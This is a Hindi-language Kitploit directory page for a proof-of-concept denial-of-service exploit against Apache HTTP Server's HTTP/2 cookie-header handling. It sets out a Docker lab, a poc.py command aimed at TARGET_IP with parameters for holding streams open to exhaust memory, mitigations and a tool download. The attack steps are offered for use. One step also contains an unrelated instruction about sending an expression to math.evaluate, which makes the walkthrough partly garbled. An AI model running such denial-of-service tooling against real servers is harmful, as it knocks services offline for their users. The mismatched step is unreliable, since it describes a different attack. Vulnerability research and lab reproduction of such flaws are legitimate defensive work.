Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-49975 — Apache HTTP Server 2.4.17-2.4.67 में कुकी-हेडर मेमोरी एक्सहॉशन DoS, CVE-2026-49975 के लिए प्रूफ-ऑफ-कॉन्सेप्ट HTTP/2 Bomb एक्सप्लॉइट, जिसमें Docker लैब और PoC स्क्रिप्ट शामिल है। | Kitploit
उपकरण/GitHubGitHub/yym8538/cve-2026-49975
भेद्यता विश्लेषणशोषणवेब सुरक्षानेटवर्क सुरक्षारेड टीमिंग
GitHubyym8538/cve-2026-49975

CVE-2026-49975

Apache HTTP Server 2.4.17-2.4.67 में कुकी-हेडर मेमोरी एक्सहॉशन DoS, CVE-2026-49975 के लिए प्रूफ-ऑफ-कॉन्सेप्ट HTTP/2 Bomb एक्सप्लॉइट, जिसमें Docker लैब और PoC स्क्रिप्ट शामिल है।

रिपॉजिटरी देखें
11 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-49975 HTTP/2 बम

★ CVE-2026-49975 HTTP/2 बम PoC ★

https://github.com/user-attachments/assets/89310771-f704-45d1-a6c3-d910de1dbc74


अवलोकन

CVE-2026-49975 Apache HTTP Server में एक Denial of Service (DoS) कमजोरी है। यह कमजोरी HTTP/2 अनुरोध हैंडलिंग पथ में होती है, जहाँ कई cookie हेडर फ़ील्ड को LimitRequestFields के विरुद्ध ठीक से गिने बिना मर्ज किया जा सकता है। एक छोटा HPACK-एन्कोडेड HTTP/2 अनुरोध भेजकर जो कई cookie हेडर फ़ील्ड में विस्तारित होता है, एक हमलावर सर्वर को Cookie हेडर मर्जिंग के दौरान बार-बार मेमोरी आवंटित करने के लिए मजबूर कर सकता है। हमलावर फिर प्रतिक्रिया संचरण में देरी करने के लिए HTTP/2 फ़्लो कंट्रोल का उपयोग कर सकता है, जिससे प्रभावित स्ट्रीम खुली रहती हैं और आवंटित मेमोरी मुक्त होने से रोकी जाती है।


प्रभावित संस्करण

श्रेणीसंस्करण
असुरक्षितApache HTTP Server 2.4.17 ≤ संस्करण ≤ 2.4.67
पैच किया गयाApache HTTP Server 2.4.68 या बाद का

प्रभाव

  • रिमोट Denial of Service (DoS)
  • अत्यधिक मेमोरी खपत
  • सामान्य उपयोगकर्ता अनुरोधों का विलंबित या विफल प्रसंस्करण

वातावरण

असुरक्षित Apache HTTP Server वातावरण बनाएँ और चलाएँ।

root@kitploit:~
docker build -t cve-2026-49975 .
docker run -d --name cve-2026-49975 --memory 8g -p 10081:80 cve-2026-49975

PoC

असुरक्षित वातावरण शुरू करने के बाद, हमले को पुन: उत्पन्न करने के लिए नीचे दिए गए चरणों का पालन करें।

चरण 1. सर्वर मेमोरी उपयोग की निगरानी करें

root@kitploit:~
docker stats cve-2026-49975

उदाहरण आउटपुट:

root@kitploit:~
CONTAINER ID   NAME             CPU %   MEM USAGE / LIMIT     MEM %
xxxxxxxxxxxx   cve-2026-49975   0.5%    35.2MiB / 8.0GiB      1.7%

चरण 2. HTTP/2 बम PoC चलाएँ

निम्नलिखित अभिव्यक्ति math.evaluate को भेजें (उदाहरण के लिए, एप्लिकेशन के गणना इनपुट के माध्यम से)।

root@kitploit:~
python3 poc.py \
  --host TARGET_IP \
  --port 10081 \
  --connections 10 \
  --streams 100 \
  --refs 4091 \
  --initial-window 0 \
  --hold 300 \
  --drip-interval 2 \
  --drip-bytes 1

चरण 3. परिणाम की पुष्टि करें

जाँचें कि Apache कंटेनर की मेमोरी उपयोग बढ़ती है और हमले की स्ट्रीम खुली रहने के दौरान उच्च बनी रहती है।

शमन

  • Apache HTTP Server को 2.4.68 या बाद के संस्करण में अपग्रेड करें
  • यदि सेवा को इसकी आवश्यकता नहीं है तो HTTP/2 को अस्थायी रूप से अक्षम करने पर विचार करें

विश्लेषण

  • KR: https://www.skshieldus.com/security-insights/reports/eqst-apache-http2-dos-cve-2026-49975
  • EN:
टूल डाउनलोड करें